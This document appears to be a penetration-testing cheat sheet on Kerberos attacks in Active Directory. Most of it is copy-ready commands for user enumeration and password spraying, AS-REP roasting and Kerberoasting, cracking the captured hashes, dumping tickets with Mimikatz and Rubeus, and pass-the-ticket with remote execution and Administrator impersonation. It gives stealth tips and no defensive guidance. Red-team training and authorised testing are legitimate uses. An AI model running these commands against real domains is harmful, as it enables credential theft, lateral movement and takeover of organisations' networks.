Kerberos Enumeration

Kerberos is the default authentication protocol in Active Directory. Understanding its enumeration is critical for identifying attack vectors like Kerberoasting, AS-REP roasting, and delegation attacks.

flowchart LR A[Kerberos Enum] --> B[User Discovery] A --> C[SPN Discovery] A --> D[Delegation] B --> B1[Kerbrute] B --> B2[AS-REP Roast] C --> C1[Kerberoasting] C --> C2[Service Accounts] D --> D1[Unconstrained] D --> D2[Constrained] D --> D3[RBCD] style A fill:#00ff00,stroke:#000,color:#000 style C1 fill:#a855f7,stroke:#000,color:#000 style B2 fill:#a855f7,stroke:#000,color:#000

User Enumeration via Kerberos

Tip

Kerberos user enumeration doesn't require credentials and generates minimal logs compared to LDAP queries.

Kerbrute

bash

# User enumeration (no creds needed)
kerbrute userenum -d corp.local --dc DC_IP users.txt

# Username bruteforce
kerbrute bruteuser -d corp.local --dc DC_IP passwords.txt username

# Password spray
kerbrute passwordspray -d corp.local --dc DC_IP users.txt 'Summer2024!'

# Common usernames to try
Administrator, admin, guest
svc_*, srv_*, service_*
sql*, backup*, scan*
helpdesk, support, printer

Nmap Kerberos Scripts

bash

# Enumerate valid users
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='corp.local',userdb=users.txt DC_IP

# Kerberos info
nmap -p 88 --script krb5-enum-users DC_IP

AS-REP Roasting

Warning

Accounts without Kerberos pre-authentication can have their hashes retrieved without credentials.

Finding AS-REP Roastable Users

bash

# LDAP query for DONT_REQ_PREAUTH
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" sAMAccountName

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket - no creds, enumerate from userlist
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip DC_IP -format hashcat -no-pass

# Impacket - with creds, find all vulnerable users
GetNPUsers.py corp.local/user:password -dc-ip DC_IP -request

Extracting AS-REP Hashes

bash

# GetNPUsers - request hashes
GetNPUsers.py corp.local/user:password -dc-ip DC_IP -request -format hashcat -outputfile asrep.txt

# Without credentials (need valid username list)
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip DC_IP -format hashcat -no-pass

# CrackMapExec
crackmapexec ldap DC_IP -u user -p pass --asreproast output.txt

# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Cracking AS-REP Hashes

bash

# Hashcat - mode 18200
hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule

# John
john --wordlist=wordlist.txt asrep.txt

Kerberoasting

Finding Kerberoastable Users

bash

# LDAP - find users with SPNs
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName

# PowerView
Get-DomainUser -SPN | Select sAMAccountName,servicePrincipalName

# CrackMapExec
crackmapexec ldap DC_IP -u user -p pass --kerberoasting output.txt

Extracting TGS Hashes

bash

# Impacket GetUserSPNs
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile tgs.txt

# Request specific SPN
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request-user sqlservice

# Rubeus
.\Rubeus.exe kerberoast /outfile:tgs.txt

# Rubeus - target specific user
.\Rubeus.exe kerberoast /user:sqlservice /outfile:tgs.txt

# Rubeus - use RC4 downgrade (more crackable)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:tgs.txt

Cracking TGS Hashes

bash

# Hashcat - mode 13100 (RC4) or 19700 (AES256)
hashcat -m 13100 tgs.txt wordlist.txt -r rules/best64.rule
hashcat -m 19700 tgs.txt wordlist.txt -r rules/best64.rule

# John
john --wordlist=wordlist.txt tgs.txt

Delegation Enumeration

Unconstrained Delegation

Warning

Machines with unconstrained delegation cache TGTs of connecting users - high-value targets!

bash

# LDAP - TRUSTED_FOR_DELEGATION flag
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName

# PowerView
Get-DomainComputer -Unconstrained
Get-DomainUser -Unconstrained

# CrackMapExec
crackmapexec ldap DC_IP -u user -p pass --trusted-for-delegation

Constrained Delegation

bash

# LDAP - msDS-AllowedToDelegateTo
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(msDS-AllowedToDelegateTo=*)" \
  sAMAccountName msDS-AllowedToDelegateTo

# PowerView
Get-DomainComputer -TrustedToAuth
Get-DomainUser -TrustedToAuth

# List what services they can delegate to
Get-DomainComputer -TrustedToAuth | Select sAMAccountName,msDS-AllowedToDelegateTo

Resource-Based Constrained Delegation

bash

# LDAP - msDS-AllowedToActOnBehalfOfOtherIdentity
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" sAMAccountName

# PowerView
Get-DomainComputer | Where-Object {$_."msDS-AllowedToActOnBehalfOfOtherIdentity"}

# Check RBCD configuration
Get-DomainComputer TARGET | Select -ExpandProperty msDS-AllowedToActOnBehalfOfOtherIdentity

Ticket Operations

Extracting Tickets

bash

# Rubeus - list all tickets
.\Rubeus.exe triage

# Rubeus - dump tickets
.\Rubeus.exe dump

# Mimikatz - export tickets
sekurlsa::tickets /export

# Impacket - request TGT
getTGT.py corp.local/user:password -dc-ip DC_IP

# Impacket - request service ticket
getST.py corp.local/user:password -dc-ip DC_IP -spn cifs/target.corp.local

Using Tickets

bash

# Rubeus - Pass the Ticket
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Mimikatz - Pass the Ticket
kerberos::ptt ticket.kirbi

# Impacket - Use ccache
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass corp.local/user@target.corp.local

# Convert between formats
ticketConverter.py ticket.kirbi ticket.ccache

Comprehensive Tool Commands

Rubeus Full Enumeration

bash

# Current user's tickets
.\Rubeus.exe triage

# Kerberoast all users
.\Rubeus.exe kerberoast

# AS-REP roast
.\Rubeus.exe asreproast

# Harvest tickets continuously
.\Rubeus.exe harvest /interval:30

# Monitor for 4624 logons
.\Rubeus.exe monitor /interval:30 /targetuser:Administrator

Impacket Suite

bash

# Full Kerberoasting
GetUserSPNs.py -dc-ip DC_IP corp.local/user:password -request

# AS-REP Roasting  
GetNPUsers.py -dc-ip DC_IP corp.local/user:password -request

# Request TGT for user
getTGT.py corp.local/user:password -dc-ip DC_IP

# Request service ticket
getST.py corp.local/user:password -dc-ip DC_IP -spn cifs/target -impersonate Administrator

# Convert ticket formats
ticketConverter.py ticket.kirbi ticket.ccache

Kerberos Enumeration

User Enumeration via Kerberos

Kerbrute

Nmap Kerberos Scripts

AS-REP Roasting

Finding AS-REP Roastable Users

Extracting AS-REP Hashes

Cracking AS-REP Hashes

Kerberoasting

Finding Kerberoastable Users

Extracting TGS Hashes

Cracking TGS Hashes

Delegation Enumeration

Unconstrained Delegation

Constrained Delegation

Resource-Based Constrained Delegation

Ticket Operations

Extracting Tickets

Using Tickets

Comprehensive Tool Commands

Rubeus Full Enumeration

Impacket Suite

Related Topics

AD Attack Paths - Kerberos

Delegation Attacks

LDAP Enumeration